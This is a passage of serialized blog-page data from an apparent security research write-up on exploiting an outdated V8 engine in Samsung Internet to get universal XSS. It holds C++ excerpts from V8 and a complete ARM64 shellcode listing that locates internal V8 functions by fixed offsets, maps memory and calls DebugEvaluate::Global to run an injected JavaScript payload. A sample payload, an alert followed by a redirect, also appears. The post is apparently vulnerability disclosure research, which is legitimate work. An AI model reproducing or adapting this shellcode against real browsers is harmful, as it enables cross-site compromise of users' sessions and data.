target_global_proxy, {}));\n",[140394],{"type":28,"tag":98,"props":140395,"children":140396},{"__ignoreMap":7},[140397,140408,140415,140422,140429,140437,140449,140457,140474,140504,140512,140524],{"type":28,"tag":116,"props":140398,"children":140399},{"class":245,"line":246},[140400,140404],{"type":28,"tag":116,"props":140401,"children":140402},{"style":282},[140403],{"type":33,"value":140255},{"type":28,"tag":116,"props":140405,"children":140406},{"style":266},[140407],{"type":33,"value":140260},{"type":28,"tag":116,"props":140409,"children":140410},{"class":245,"line":256},[140411],{"type":28,"tag":116,"props":140412,"children":140413},{"emptyLinePlaceholder":19},[140414],{"type":33,"value":1044},{"type":28,"tag":116,"props":140416,"children":140417},{"class":245,"line":293},[140418],{"type":28,"tag":116,"props":140419,"children":140420},{"style":266},[140421],{"type":33,"value":126766},{"type":28,"tag":116,"props":140423,"children":140424},{"class":245,"line":361},[140425],{"type":28,"tag":116,"props":140426,"children":140427},{"emptyLinePlaceholder":19},[140428],{"type":33,"value":1044},{"type":28,"tag":116,"props":140430,"children":140431},{"class":245,"line":387},[140432],{"type":28,"tag":116,"props":140433,"children":140434},{"style":266},[140435],{"type":33,"value":140436},"  DirectHandle\u003CJSFunction> function;\n",{"type":28,"tag":116,"props":140438,"children":140439},{"class":245,"line":400},[140440,140445],{"type":28,"tag":116,"props":140441,"children":140442},{"style":282},[140443],{"type":33,"value":140444},"  ASSIGN_RETURN_FAILURE_ON_EXCEPTION",{"type":28,"tag":116,"props":140446,"children":140447},{"style":266},[140448],{"type":33,"value":3133},{"type":28,"tag":116,"props":140450,"children":140451},{"class":245,"line":614},[140452],{"type":28,"tag":116,"props":140453,"children":140454},{"style":266},[140455],{"type":33,"value":140456},"      isolate, function,\n",{"type":28,"tag":116,"props":140458,"children":140459},{"class":245,"line":631},[140460,140465,140470],{"type":28,"tag":116,"props":140461,"children":140462},{"style":266},[140463],{"type":33,"value":140464},"      Compiler::",{"type":28,"tag":116,"props":140466,"children":140467},{"style":282},[140468],{"type":33,"value":140469},"GetFunctionFromValidatedString",{"type":28,"tag":116,"props":140471,"children":140472},{"style":266},[140473],{"type":33,"value":3133},{"type":28,"tag":116,"props":140475,"children":140476},{"class":245,"line":665},[140477,140482,140486,140490,140494,140499],{"type":28,"tag":116,"props":140478,"children":140479},{"style":282},[140480],{"type":33,"value":140481},"          direct_handle",{"type":28,"tag":116,"props":140483,"children":140484},{"style":266},[140485],{"type":33,"value":313},{"type":28,"tag":116,"props":140487,"children":140488},{"style":272},[140489],{"type":33,"value":114691},{"type":28,"tag":116,"props":140491,"children":140492},{"style":266},[140493],{"type":33,"value":13423},{"type":28,"tag":116,"props":140495,"children":140496},{"style":282},[140497],{"type":33,"value":140498},"native_context",{"type":28,"tag":116,"props":140500,"children":140501},{"style":266},[140502],{"type":33,"value":140503},"(), isolate), source,\n",{"type":28,"tag":116,"props":140505,"children":140506},{"class":245,"line":713},[140507],{"type":28,"tag":116,"props":140508,"children":140509},{"style":266},[140510],{"type":33,"value":140511},"          NO_PARSE_RESTRICTION, kNoSourcePosition));\n",{"type":28,"tag":116,"props":140513,"children":140514},{"class":245,"line":750},[140515,140520],{"type":28,"tag":116,"props":140516,"children":140517},{"style":282},[140518],{"type":33,"value":140519},"  RETURN_RESULT_OR_FAILURE",{"type":28,"tag":116,"props":140521,"children":140522},{"style":266},[140523],{"type":33,"value":3133},{"type":28,"tag":116,"props":140525,"children":140526},{"class":245,"line":779},[140527,140532,140537],{"type":28,"tag":116,"props":140528,"children":140529},{"style":266},[140530],{"type":33,"value":140531},"      isolate, Execution::",{"type":28,"tag":116,"props":140533,"children":140534},{"style":282},[140535],{"type":33,"value":140536},"Call",{"type":28,"tag":116,"props":140538,"children":140539},{"style":266},[140540],{"type":33,"value":140541},"(isolate, function, target_global_proxy, {}));\n",{"type":28,"tag":29,"props":140543,"children":140544},{},[140545,140547,140552,140554,140560,140562,140568,140570,140576],{"type":33,"value":140546},"But determining the correct ",{"type":28,"tag":98,"props":140548,"children":140550},{"className":140549},[],[140551],{"type":33,"value":114691},{"type":33,"value":140553}," value, obtaining ",{"type":28,"tag":98,"props":140555,"children":140557},{"className":140556},[],[140558],{"type":33,"value":140559},"target->native_context()",{"type":33,"value":140561},", and locating the ",{"type":28,"tag":98,"props":140563,"children":140565},{"className":140564},[],[140566],{"type":33,"value":140567},"direct_handle",{"type":33,"value":140569}," function, just to make a proper call to ",{"type":28,"tag":98,"props":140571,"children":140573},{"className":140572},[],[140574],{"type":33,"value":140575},"Compiler::GetFunctionFromValidatedString",{"type":33,"value":140577},", seemed unnecessarily cumbersome.",{"type":28,"tag":29,"props":140579,"children":140580},{},[140581,140583,140589],{"type":33,"value":140582},"Instead, we found a much simpler option with no security checks: ",{"type":28,"tag":98,"props":140584,"children":140586},{"className":140585},[],[140587],{"type":33,"value":140588},"DebugEvaluate::Global",{"type":33,"value":140590},". This function is used by the DevTools console to evaluate JavaScript entered there.",{"type":28,"tag":29,"props":140592,"children":140593},{},[140594],{"type":33,"value":140595},"For our needs, it is straightforward to call:",{"type":28,"tag":234,"props":140597,"children":140599},{"code":140598,"language":28767,"meta":7,"className":28765,"style":7},"MaybeDirectHandle\u003CObject> DebugEvaluate::Global(Isolate* isolate,\n                                                Handle\u003CString> source,\n                                                debug::EvaluateGlobalMode mode,\n                                                REPLMode repl_mode);\n",[140600],{"type":28,"tag":98,"props":140601,"children":140602},{"__ignoreMap":7},[140603,140651,140680,140701],{"type":28,"tag":116,"props":140604,"children":140605},{"class":245,"line":246},[140606,140611,140615,140619,140624,140629,140633,140638,140642,140647],{"type":28,"tag":116,"props":140607,"children":140608},{"style":339},[140609],{"type":33,"value":140610},"MaybeDirectHandle",{"type":28,"tag":116,"props":140612,"children":140613},{"style":266},[140614],{"type":33,"value":514},{"type":28,"tag":116,"props":140616,"children":140617},{"style":339},[140618],{"type":33,"value":48472},{"type":28,"tag":116,"props":140620,"children":140621},{"style":266},[140622],{"type":33,"value":140623},"> DebugEvaluate::",{"type":28,"tag":116,"props":140625,"children":140626},{"style":282},[140627],{"type":33,"value":140628},"Global",{"type":28,"tag":116,"props":140630,"children":140631},{"style":266},[140632],{"type":33,"value":313},{"type":28,"tag":116,"props":140634,"children":140635},{"style":339},[140636],{"type":33,"value":140637},"Isolate",{"type":28,"tag":116,"props":140639,"children":140640},{"style":376},[140641],{"type":33,"value":4240},{"type":28,"tag":116,"props":140643,"children":140644},{"style":272},[140645],{"type":33,"value":140646}," isolate",{"type":28,"tag":116,"props":140648,"children":140649},{"style":266},[140650],{"type":33,"value":3178},{"type":28,"tag":116,"props":140652,"children":140653},{"class":245,"line":256},[140654,140659,140663,140667,140671,140676],{"type":28,"tag":116,"props":140655,"children":140656},{"style":339},[140657],{"type":33,"value":140658},"                                                Handle",{"type":28,"tag":116,"props":140660,"children":140661},{"style":266},[140662],{"type":33,"value":514},{"type":28,"tag":116,"props":140664,"children":140665},{"style":339},[140666],{"type":33,"value":47551},{"type":28,"tag":116,"props":140668,"children":140669},{"style":266},[140670],{"type":33,"value":5492},{"type":28,"tag":116,"props":140672,"children":140673},{"style":272},[140674],{"type":33,"value":140675},"source",{"type":28,"tag":116,"props":140677,"children":140678},{"style":266},[140679],{"type":33,"value":3178},{"type":28,"tag":116,"props":140681,"children":140682},{"class":245,"line":293},[140683,140688,140693,140697],{"type":28,"tag":116,"props":140684,"children":140685},{"style":266},[140686],{"type":33,"value":140687},"                                                debug::",{"type":28,"tag":116,"props":140689,"children":140690},{"style":339},[140691],{"type":33,"value":140692},"EvaluateGlobalMode",{"type":28,"tag":116,"props":140694,"children":140695},{"style":272},[140696],{"type":33,"value":105887},{"type":28,"tag":116,"props":140698,"children":140699},{"style":266},[140700],{"type":33,"value":3178},{"type":28,"tag":116,"props":140702,"children":140703},{"class":245,"line":361},[140704,140709,140714],{"type":28,"tag":116,"props":140705,"children":140706},{"style":339},[140707],{"type":33,"value":140708},"                                                REPLMode",{"type":28,"tag":116,"props":140710,"children":140711},{"style":272},[140712],{"type":33,"value":140713}," repl_mode",{"type":28,"tag":116,"props":140715,"children":140716},{"style":266},[140717],{"type":33,"value":895},{"type":28,"tag":29,"props":140719,"children":140720},{},[140721,140723,140728,140730,140735,140737,140742,140744,140750,140751,140757],{"type":33,"value":140722},"We must supply the ",{"type":28,"tag":98,"props":140724,"children":140726},{"className":140725},[],[140727],{"type":33,"value":140296},{"type":33,"value":140729}," pointer, a ",{"type":28,"tag":98,"props":140731,"children":140733},{"className":140732},[],[140734],{"type":33,"value":47551},{"type":33,"value":140736}," object containing our XSS payload as ",{"type":28,"tag":98,"props":140738,"children":140740},{"className":140739},[],[140741],{"type":33,"value":140675},{"type":33,"value":140743},", and the ",{"type":28,"tag":98,"props":140745,"children":140747},{"className":140746},[],[140748],{"type":33,"value":140749},"mode",{"type":33,"value":10659},{"type":28,"tag":98,"props":140752,"children":140754},{"className":140753},[],[140755],{"type":33,"value":140756},"repl_mode",{"type":33,"value":140758}," values, which are simple enum literals.",{"type":28,"tag":29,"props":140760,"children":140761},{},[140762,140764,140769,140771,140777,140779,140784,140786,140791,140793,140799,140801,140807,140809,140814,140816,140821,140823,140828,140830,140835],{"type":33,"value":140763},"To obtain the ",{"type":28,"tag":98,"props":140765,"children":140767},{"className":140766},[],[140768],{"type":33,"value":140296},{"type":33,"value":140770}," pointer within our shellcode, we call ",{"type":28,"tag":98,"props":140772,"children":140774},{"className":140773},[],[140775],{"type":33,"value":140776},"Isolate::TryGetCurrent()",{"type":33,"value":140778},", which returns the current ",{"type":28,"tag":98,"props":140780,"children":140782},{"className":140781},[],[140783],{"type":33,"value":140296},{"type":33,"value":140785},". To construct a valid ",{"type":28,"tag":98,"props":140787,"children":140789},{"className":140788},[],[140790],{"type":33,"value":47551},{"type":33,"value":140792}," object holding our payload, we call ",{"type":28,"tag":98,"props":140794,"children":140796},{"className":140795},[],[140797],{"type":33,"value":140798},"v8::String::NewFromUTF8",{"type":33,"value":140800},". This ",{"type":28,"tag":98,"props":140802,"children":140804},{"className":140803},[],[140805],{"type":33,"value":140806},"NewFromUTF8",{"type":33,"value":140808}," function takes four arguments: the ",{"type":28,"tag":98,"props":140810,"children":140812},{"className":140811},[],[140813],{"type":33,"value":140296},{"type":33,"value":140815},", the string bytes as ",{"type":28,"tag":98,"props":140817,"children":140819},{"className":140818},[],[140820],{"type":33,"value":3372},{"type":33,"value":140822},", an enum literal specifying the string type, and ",{"type":28,"tag":98,"props":140824,"children":140826},{"className":140825},[],[140827],{"type":33,"value":8176},{"type":33,"value":140829},", which is the size of the ",{"type":28,"tag":98,"props":140831,"children":140833},{"className":140832},[],[140834],{"type":33,"value":3372},{"type":33,"value":16825},{"type":28,"tag":29,"props":140837,"children":140838},{},[140839],{"type":33,"value":140840},"The resulting shellcode that executes our XSS payload looks like this:",{"type":28,"tag":234,"props":140842,"children":140844},{"code":140843,"language":139132,"meta":7,"className":139133,"style":7},"// get isolate ptr, v8::Isolate::TryGetCurrent(0x9ba3bd0)\nmovz x1, #0xf7a0\nmovk x1, #0x0071, lsl #16\nadd x9, x12, x1\nmovz x1, #0x5ac8\nmovk x1, #0x054f, lsl #16\nadd x0, x12, x1\nblr x9\n// *x0 is isolate pointer\n// store isolate ptr to stack\nldr x13, [x0]\nstr x13, [sp, #-16]!\n\n// store x10 = v8::String::NewFromUTF8\nmovz x1, #0x1140\nmovk x1, #0x0242, lsl #16\nsub x10, x12, x1\n\n// mmap a RW page for our xss payload\nmov x0, #0\nmov x1, #{page_align(len(XSS_PAYLOAD))}\nmov x2, #3\nmov x3, #34\nmov x4, #-1\nmov x5, #0\nmov x8, #222\nsvc #0\n\n// write our xss payload to mmapped rw page\n{write_str(XSS_PAYLOAD, \"x0\")}\n\n// store x11 = XSS_PAYLOAD string\nmov x11, x0\n\n// pop back isolate pointer\nldr x13, [sp], #16\n\n// at this point:\n// x13 = isolate *\n// x11 = XSS_PAYLOAD string mmapped region\n// x10 = v8::String::NewFromUtf8\n\n// call v8::String::NewFromUTF8 with our xss_payload\n// arg0 = isolate *\nmov x0, x13\n// arg1 = char *c_str\nmov x1, x11\n// arg2 = type = kNormal\nmov x2, #0\n// arg4 = length\nmov w3, #{len(XSS_PAYLOAD)}\n// call NewFromUTF8\nblr x10\n\n// store x14 = String XSS_PAYLOAD\nmov x14, x0\n\n// store x9 = v8::internal::DebugEvaluate::Global\nmovz x1, #0xe44c\nmovk x1, #0x014e, lsl #16\nsub x9, x12, x1\n\n// call v8::internal::DebugEvaluate::Global\n// arg0 = isolate *\nmov x0, x13\n// arg1 = String *source\nmov x1, x14\n// arg2 = mode = kDefault\nmov x2, #0\n// arg3 = repl_mode = kYes\nmov x3, #0\n\nblr x9\n",[140845],{"type":28,"tag":98,"props":140846,"children":140847},{"__ignoreMap":7},[140848,140856,140864,140872,140880,140888,140896,140904,140912,140920,140928,140936,140944,140951,140959,140967,140975,140983,140990,140998,141005,141013,141021,141028,141035,141042,141049,141056,141063,141071,141079,141086,141094,141102,141109,141117,141125,141132,141139,141147,141155,141163,141170,141178,141186,141194,141202,141210,141218,141226,141234,141242,141250,141258,141265,141273,141281,141288,141296,141304,141312,141320,141327,141335,141342,141349,141357,141365,141373,141381,141390,141399,141407],{"type":28,"tag":116,"props":140849,"children":140850},{"class":245,"line":246},[140851],{"type":28,"tag":116,"props":140852,"children":140853},{},[140854],{"type":33,"value":140855},"// get isolate ptr, v8::Isolate::TryGetCurrent(0x9ba3bd0)\n",{"type":28,"tag":116,"props":140857,"children":140858},{"class":245,"line":256},[140859],{"type":28,"tag":116,"props":140860,"children":140861},{},[140862],{"type":33,"value":140863},"movz x1, #0xf7a0\n",{"type":28,"tag":116,"props":140865,"children":140866},{"class":245,"line":293},[140867],{"type":28,"tag":116,"props":140868,"children":140869},{},[140870],{"type":33,"value":140871},"movk x1, #0x0071, lsl #16\n",{"type":28,"tag":116,"props":140873,"children":140874},{"class":245,"line":361},[140875],{"type":28,"tag":116,"props":140876,"children":140877},{},[140878],{"type":33,"value":140879},"add x9, x12, x1\n",{"type":28,"tag":116,"props":140881,"children":140882},{"class":245,"line":387},[140883],{"type":28,"tag":116,"props":140884,"children":140885},{},[140886],{"type":33,"value":140887},"movz x1, #0x5ac8\n",{"type":28,"tag":116,"props":140889,"children":140890},{"class":245,"line":400},[140891],{"type":28,"tag":116,"props":140892,"children":140893},{},[140894],{"type":33,"value":140895},"movk x1, #0x054f, lsl #16\n",{"type":28,"tag":116,"props":140897,"children":140898},{"class":245,"line":614},[140899],{"type":28,"tag":116,"props":140900,"children":140901},{},[140902],{"type":33,"value":140903},"add x0, x12, x1\n",{"type":28,"tag":116,"props":140905,"children":140906},{"class":245,"line":631},[140907],{"type":28,"tag":116,"props":140908,"children":140909},{},[140910],{"type":33,"value":140911},"blr x9\n",{"type":28,"tag":116,"props":140913,"children":140914},{"class":245,"line":665},[140915],{"type":28,"tag":116,"props":140916,"children":140917},{},[140918],{"type":33,"value":140919},"// *x0 is isolate pointer\n",{"type":28,"tag":116,"props":140921,"children":140922},{"class":245,"line":713},[140923],{"type":28,"tag":116,"props":140924,"children":140925},{},[140926],{"type":33,"value":140927},"// store isolate ptr to stack\n",{"type":28,"tag":116,"props":140929,"children":140930},{"class":245,"line":750},[140931],{"type":28,"tag":116,"props":140932,"children":140933},{},[140934],{"type":33,"value":140935},"ldr x13, [x0]\n",{"type":28,"tag":116,"props":140937,"children":140938},{"class":245,"line":779},[140939],{"type":28,"tag":116,"props":140940,"children":140941},{},[140942],{"type":33,"value":140943},"str x13, [sp, #-16]!\n",{"type":28,"tag":116,"props":140945,"children":140946},{"class":245,"line":796},[140947],{"type":28,"tag":116,"props":140948,"children":140949},{"emptyLinePlaceholder":19},[140950],{"type":33,"value":1044},{"type":28,"tag":116,"props":140952,"children":140953},{"class":245,"line":847},[140954],{"type":28,"tag":116,"props":140955,"children":140956},{},[140957],{"type":33,"value":140958},"// store x10 = v8::String::NewFromUTF8\n",{"type":28,"tag":116,"props":140960,"children":140961},{"class":245,"line":898},[140962],{"type":28,"tag":116,"props":140963,"children":140964},{},[140965],{"type":33,"value":140966},"movz x1, #0x1140\n",{"type":28,"tag":116,"props":140968,"children":140969},{"class":245,"line":907},[140970],{"type":28,"tag":116,"props":140971,"children":140972},{},[140973],{"type":33,"value":140974},"movk x1, #0x0242, lsl #16\n",{"type":28,"tag":116,"props":140976,"children":140977},{"class":245,"line":981},[140978],{"type":28,"tag":116,"props":140979,"children":140980},{},[140981],{"type":33,"value":140982},"sub x10, x12, x1\n",{"type":28,"tag":116,"props":140984,"children":140985},{"class":245,"line":1011},[140986],{"type":28,"tag":116,"props":140987,"children":140988},{"emptyLinePlaceholder":19},[140989],{"type":33,"value":1044},{"type":28,"tag":116,"props":140991,"children":140992},{"class":245,"line":1029},[140993],{"type":28,"tag":116,"props":140994,"children":140995},{},[140996],{"type":33,"value":140997},"// mmap a RW page for our xss payload\n",{"type":28,"tag":116,"props":140999,"children":141000},{"class":245,"line":1038},[141001],{"type":28,"tag":116,"props":141002,"children":141003},{},[141004],{"type":33,"value":139348},{"type":28,"tag":116,"props":141006,"children":141007},{"class":245,"line":1047},[141008],{"type":28,"tag":116,"props":141009,"children":141010},{},[141011],{"type":33,"value":141012},"mov x1, #{page_align(len(XSS_PAYLOAD))}\n",{"type":28,"tag":116,"props":141014,"children":141015},{"class":245,"line":1071},[141016],{"type":28,"tag":116,"props":141017,"children":141018},{},[141019],{"type":33,"value":141020},"mov x2, #3\n",{"type":28,"tag":116,"props":141022,"children":141023},{"class":245,"line":1137},[141024],{"type":28,"tag":116,"props":141025,"children":141026},{},[141027],{"type":33,"value":139371},{"type":28,"tag":116,"props":141029,"children":141030},{"class":245,"line":1181},[141031],{"type":28,"tag":116,"props":141032,"children":141033},{},[141034],{"type":33,"value":139379},{"type":28,"tag":116,"props":141036,"children":141037},{"class":245,"line":1212},[141038],{"type":28,"tag":116,"props":141039,"children":141040},{},[141041],{"type":33,"value":139387},{"type":28,"tag":116,"props":141043,"children":141044},{"class":245,"line":1254},[141045],{"type":28,"tag":116,"props":141046,"children":141047},{},[141048],{"type":33,"value":139395},{"type":28,"tag":116,"props":141050,"children":141051},{"class":245,"line":1262},[141052],{"type":28,"tag":116,"props":141053,"children":141054},{},[141055],{"type":33,"value":139310},{"type":28,"tag":116,"props":141057,"children":141058},{"class":245,"line":1294},[141059],{"type":28,"tag":116,"props":141060,"children":141061},{"emptyLinePlaceholder":19},[141062],{"type":33,"value":1044},{"type":28,"tag":116,"props":141064,"children":141065},{"class":245,"line":1334},[141066],{"type":28,"tag":116,"props":141067,"children":141068},{},[141069],{"type":33,"value":141070},"// write our xss payload to mmapped rw page\n",{"type":28,"tag":116,"props":141072,"children":141073},{"class":245,"line":1372},[141074],{"type":28,"tag":116,"props":141075,"children":141076},{},[141077],{"type":33,"value":141078},"{write_str(XSS_PAYLOAD, \"x0\")}\n",{"type":28,"tag":116,"props":141080,"children":141081},{"class":245,"line":1381},[141082],{"type":28,"tag":116,"props":141083,"children":141084},{"emptyLinePlaceholder":19},[141085],{"type":33,"value":1044},{"type":28,"tag":116,"props":141087,"children":141088},{"class":245,"line":1389},[141089],{"type":28,"tag":116,"props":141090,"children":141091},{},[141092],{"type":33,"value":141093},"// store x11 = XSS_PAYLOAD string\n",{"type":28,"tag":116,"props":141095,"children":141096},{"class":245,"line":1425},[141097],{"type":28,"tag":116,"props":141098,"children":141099},{},[141100],{"type":33,"value":141101},"mov x11, x0\n",{"type":28,"tag":116,"props":141103,"children":141104},{"class":245,"line":1448},[141105],{"type":28,"tag":116,"props":141106,"children":141107},{"emptyLinePlaceholder":19},[141108],{"type":33,"value":1044},{"type":28,"tag":116,"props":141110,"children":141111},{"class":245,"line":1456},[141112],{"type":28,"tag":116,"props":141113,"children":141114},{},[141115],{"type":33,"value":141116},"// pop back isolate pointer\n",{"type":28,"tag":116,"props":141118,"children":141119},{"class":245,"line":1520},[141120],{"type":28,"tag":116,"props":141121,"children":141122},{},[141123],{"type":33,"value":141124},"ldr x13, [sp], #16\n",{"type":28,"tag":116,"props":141126,"children":141127},{"class":245,"line":1580},[141128],{"type":28,"tag":116,"props":141129,"children":141130},{"emptyLinePlaceholder":19},[141131],{"type":33,"value":1044},{"type":28,"tag":116,"props":141133,"children":141134},{"class":245,"line":1620},[141135],{"type":28,"tag":116,"props":141136,"children":141137},{},[141138],{"type":33,"value":139431},{"type":28,"tag":116,"props":141140,"children":141141},{"class":245,"line":1668},[141142],{"type":28,"tag":116,"props":141143,"children":141144},{},[141145],{"type":33,"value":141146},"// x13 = isolate *\n",{"type":28,"tag":116,"props":141148,"children":141149},{"class":245,"line":1677},[141150],{"type":28,"tag":116,"props":141151,"children":141152},{},[141153],{"type":33,"value":141154},"// x11 = XSS_PAYLOAD string mmapped region\n",{"type":28,"tag":116,"props":141156,"children":141157},{"class":245,"line":1685},[141158],{"type":28,"tag":116,"props":141159,"children":141160},{},[141161],{"type":33,"value":141162},"// x10 = v8::String::NewFromUtf8\n",{"type":28,"tag":116,"props":141164,"children":141165},{"class":245,"line":1729},[141166],{"type":28,"tag":116,"props":141167,"children":141168},{"emptyLinePlaceholder":19},[141169],{"type":33,"value":1044},{"type":28,"tag":116,"props":141171,"children":141172},{"class":245,"line":1764},[141173],{"type":28,"tag":116,"props":141174,"children":141175},{},[141176],{"type":33,"value":141177},"// call v8::String::NewFromUTF8 with our xss_payload\n",{"type":28,"tag":116,"props":141179,"children":141180},{"class":245,"line":1896},[141181],{"type":28,"tag":116,"props":141182,"children":141183},{},[141184],{"type":33,"value":141185},"// arg0 = isolate *\n",{"type":28,"tag":116,"props":141187,"children":141188},{"class":245,"line":1932},[141189],{"type":28,"tag":116,"props":141190,"children":141191},{},[141192],{"type":33,"value":141193},"mov x0, x13\n",{"type":28,"tag":116,"props":141195,"children":141196},{"class":245,"line":1940},[141197],{"type":28,"tag":116,"props":141198,"children":141199},{},[141200],{"type":33,"value":141201},"// arg1 = char *c_str\n",{"type":28,"tag":116,"props":141203,"children":141204},{"class":245,"line":1948},[141205],{"type":28,"tag":116,"props":141206,"children":141207},{},[141208],{"type":33,"value":141209},"mov x1, x11\n",{"type":28,"tag":116,"props":141211,"children":141212},{"class":245,"line":1957},[141213],{"type":28,"tag":116,"props":141214,"children":141215},{},[141216],{"type":33,"value":141217},"// arg2 = type = kNormal\n",{"type":28,"tag":116,"props":141219,"children":141220},{"class":245,"line":1970},[141221],{"type":28,"tag":116,"props":141222,"children":141223},{},[141224],{"type":33,"value":141225},"mov x2, #0\n",{"type":28,"tag":116,"props":141227,"children":141228},{"class":245,"line":1987},[141229],{"type":28,"tag":116,"props":141230,"children":141231},{},[141232],{"type":33,"value":141233},"// arg4 = length\n",{"type":28,"tag":116,"props":141235,"children":141236},{"class":245,"line":2003},[141237],{"type":28,"tag":116,"props":141238,"children":141239},{},[141240],{"type":33,"value":141241},"mov w3, #{len(XSS_PAYLOAD)}\n",{"type":28,"tag":116,"props":141243,"children":141244},{"class":245,"line":31949},[141245],{"type":28,"tag":116,"props":141246,"children":141247},{},[141248],{"type":33,"value":141249},"// call NewFromUTF8\n",{"type":28,"tag":116,"props":141251,"children":141252},{"class":245,"line":80570},[141253],{"type":28,"tag":116,"props":141254,"children":141255},{},[141256],{"type":33,"value":141257},"blr x10\n",{"type":28,"tag":116,"props":141259,"children":141260},{"class":245,"line":80583},[141261],{"type":28,"tag":116,"props":141262,"children":141263},{"emptyLinePlaceholder":19},[141264],{"type":33,"value":1044},{"type":28,"tag":116,"props":141266,"children":141267},{"class":245,"line":80591},[141268],{"type":28,"tag":116,"props":141269,"children":141270},{},[141271],{"type":33,"value":141272},"// store x14 = String XSS_PAYLOAD\n",{"type":28,"tag":116,"props":141274,"children":141275},{"class":245,"line":80599},[141276],{"type":28,"tag":116,"props":141277,"children":141278},{},[141279],{"type":33,"value":141280},"mov x14, x0\n",{"type":28,"tag":116,"props":141282,"children":141283},{"class":245,"line":80607},[141284],{"type":28,"tag":116,"props":141285,"children":141286},{"emptyLinePlaceholder":19},[141287],{"type":33,"value":1044},{"type":28,"tag":116,"props":141289,"children":141290},{"class":245,"line":80647},[141291],{"type":28,"tag":116,"props":141292,"children":141293},{},[141294],{"type":33,"value":141295},"// store x9 = v8::internal::DebugEvaluate::Global\n",{"type":28,"tag":116,"props":141297,"children":141298},{"class":245,"line":80655},[141299],{"type":28,"tag":116,"props":141300,"children":141301},{},[141302],{"type":33,"value":141303},"movz x1, #0xe44c\n",{"type":28,"tag":116,"props":141305,"children":141306},{"class":245,"line":87841},[141307],{"type":28,"tag":116,"props":141308,"children":141309},{},[141310],{"type":33,"value":141311},"movk x1, #0x014e, lsl #16\n",{"type":28,"tag":116,"props":141313,"children":141314},{"class":245,"line":87849},[141315],{"type":28,"tag":116,"props":141316,"children":141317},{},[141318],{"type":33,"value":141319},"sub x9, x12, x1\n",{"type":28,"tag":116,"props":141321,"children":141322},{"class":245,"line":101191},[141323],{"type":28,"tag":116,"props":141324,"children":141325},{"emptyLinePlaceholder":19},[141326],{"type":33,"value":1044},{"type":28,"tag":116,"props":141328,"children":141329},{"class":245,"line":101199},[141330],{"type":28,"tag":116,"props":141331,"children":141332},{},[141333],{"type":33,"value":141334},"// call v8::internal::DebugEvaluate::Global\n",{"type":28,"tag":116,"props":141336,"children":141337},{"class":245,"line":101207},[141338],{"type":28,"tag":116,"props":141339,"children":141340},{},[141341],{"type":33,"value":141185},{"type":28,"tag":116,"props":141343,"children":141344},{"class":245,"line":101215},[141345],{"type":28,"tag":116,"props":141346,"children":141347},{},[141348],{"type":33,"value":141193},{"type":28,"tag":116,"props":141350,"children":141351},{"class":245,"line":101243},[141352],{"type":28,"tag":116,"props":141353,"children":141354},{},[141355],{"type":33,"value":141356},"// arg1 = String *source\n",{"type":28,"tag":116,"props":141358,"children":141359},{"class":245,"line":104013},[141360],{"type":28,"tag":116,"props":141361,"children":141362},{},[141363],{"type":33,"value":141364},"mov x1, x14\n",{"type":28,"tag":116,"props":141366,"children":141367},{"class":245,"line":104021},[141368],{"type":28,"tag":116,"props":141369,"children":141370},{},[141371],{"type":33,"value":141372},"// arg2 = mode = kDefault\n",{"type":28,"tag":116,"props":141374,"children":141376},{"class":245,"line":141375},69,[141377],{"type":28,"tag":116,"props":141378,"children":141379},{},[141380],{"type":33,"value":141225},{"type":28,"tag":116,"props":141382,"children":141384},{"class":245,"line":141383},70,[141385],{"type":28,"tag":116,"props":141386,"children":141387},{},[141388],{"type":33,"value":141389},"// arg3 = repl_mode = kYes\n",{"type":28,"tag":116,"props":141391,"children":141393},{"class":245,"line":141392},71,[141394],{"type":28,"tag":116,"props":141395,"children":141396},{},[141397],{"type":33,"value":141398},"mov x3, #0\n",{"type":28,"tag":116,"props":141400,"children":141402},{"class":245,"line":141401},72,[141403],{"type":28,"tag":116,"props":141404,"children":141405},{"emptyLinePlaceholder":19},[141406],{"type":33,"value":1044},{"type":28,"tag":116,"props":141408,"children":141410},{"class":245,"line":141409},73,[141411],{"type":28,"tag":116,"props":141412,"children":141413},{},[141414],{"type":33,"value":140911},{"type":28,"tag":75,"props":141416,"children":141418},{"id":141417},"uxss-demo",[141419],{"type":33,"value":141420},"UXSS Demo",{"type":28,"tag":29,"props":141422,"children":141423},{},[141424,141426,141432],{"type":33,"value":141425},"Below is a demo that executes the following UXSS payload: ",{"type":28,"tag":98,"props":141427,"children":141429},{"className":141428},[],[141430],{"type":33,"value":141431},"alert(document.domain); window.location.href = \"https://cor.team/\";",{"type":33,"value":141},{"type":28,"tag":1318,"props":141434,"children":141437},{"className":141435,"controls":19},[141436],"blog-video-responsive",[141438,141440,141444],{"type":33,"value":141439},"\n  ",{"type":28,"tag":140675,"props":141441,"children":141443},{"src":141442,"type":131469},"/posts/mobile-renderer-rce/demo.mp4",[],{"type":33,"value":141445},"\n  Your browser does not support the video tag.\n",{"type":28,"tag":63,"props":141447,"children":141448},{"id":2506},[141449],{"type":33,"value":2509},{"type":28,"tag":29,"props":141451,"children":141452},{},[141453],{"type":33,"value":141454},"Given the complex nature of the modern software ecosystem, it is unsurprising to find core out of date libraries in popular applications. Samsung Internet relied on a six month old version of V8, a JavaScript engine where researchers frequently discover new vulnerabilities, providing us a large window for n-day exploitation.",{"type":28,"tag":29,"props":141456,"children":141457},{},[141458],{"type":33,"value":141459},"While renderer bugs are usually chained with another exploit such as a sandbox escape, we pushed the capabilities of the bug by targeting the weaker Site Isolation mechanism on mobile. As most web pages ran under the same process, we could inject shellcode into the JavaScript interpreter to achieve universal XSS in Samsung Internet browser.",{"type":28,"tag":2516,"props":141461,"children":141462},{},[141463],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":141465},[141466,141470,141473,141483],{"id":28670,"depth":256,"text":28673,"children":141467},[141468,141469],{"id":131603,"depth":293,"text":131606},{"id":131686,"depth":293,"text":131689},{"id":131719,"depth":256,"text":131722,"children":141471},[141472],{"id":131860,"depth":293,"text":131714},{"id":132004,"depth":256,"text":132007,"children":141474},[141475,141476,141477,141478,141479,141480,141481,141482],{"id":132010,"depth":293,"text":132013},{"id":132467,"depth":293,"text":132470},{"id":132650,"depth":293,"text":132653},{"id":132761,"depth":293,"text":132764},{"id":133038,"depth":293,"text":133041},{"id":135748,"depth":293,"text":135751},{"id":139029,"depth":293,"text":139032},{"id":141417,"depth":293,"text":141420},{"id":2506,"depth":256,"text":2509},"content:blog:2026-04-01-patch-gap-to-mobile-renderer-rce.md","blog/2026-04-01-patch-gap-to-mobile-renderer-rce.md","blog/2026-04-01-patch-gap-to-mobile-renderer-rce",{"_path":141488,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":141489,"description":141490,"date":1414